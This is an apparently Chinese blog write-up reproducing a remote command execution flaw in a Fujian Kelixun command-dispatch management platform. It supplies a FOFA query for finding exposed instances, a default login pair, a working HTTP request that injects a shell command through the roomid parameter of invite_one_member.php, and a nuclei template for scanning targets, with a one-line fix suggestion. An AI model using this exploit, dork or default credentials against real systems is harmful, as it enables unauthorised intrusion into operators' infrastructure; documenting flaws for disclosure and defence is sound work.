福建科立讯通信有限公司指挥调度管理平台invite_one_member.php接口RCE

0x01 产品简介

福建科立讯通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度和管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务,并即时获取现场反馈和报告。

0x02 漏洞描述

福建科立讯通信有限公司指挥调度管理平台invite_one_member.php接口RCE。

0x03 影响版本

0x04 搜索语法

FOFA

1
body="指挥调度管理平台" && title=="指挥调度管理平台"

0x05 漏洞复现

系统登录界面

image-20240812121407763

该系统还存在默认密码,经检验发现有一堆

1
huamai/huamai

image-20240812123517032

下面是rce 的利用过程

漏洞利用poc
image-20240812130416178

1
2
3
GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`id>123321.txt` HTTP/2
Host: www.52cainiao.cc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

image-20240812130441939

1
http://ip/api/client/audiobroadcast/123321.txt

nuclei的poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
id: fu_jian_ke_li-invite_one_member-RCE

info:
  name: 福建科立讯通信有限公司指挥调度管理平台invite_one_member.php接口RCE
  author: admin
  severity: high
  tags: 管理平台,RCE,福建科立讯通信有限公司



http:
  - raw:
      - |
        GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`id%3E123321.txt` HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

    matchers:
      - type: word
        part: body
        words:
          - "id>123321.txt"

image-20240812130549644

0x06 修复建议

授权+强密码

#漏洞复现
福建科立讯通信有限公司指挥调度管理平台invite_one_member.php接口RCE
https://tsy244.github.io/2024/08/12/漏洞复现/福建科立讯通信有限公司指挥调度管理平台invite-one-member-php接口RCE/
Author
August Rosenberg
Posted on
August 12, 2024
Licensed under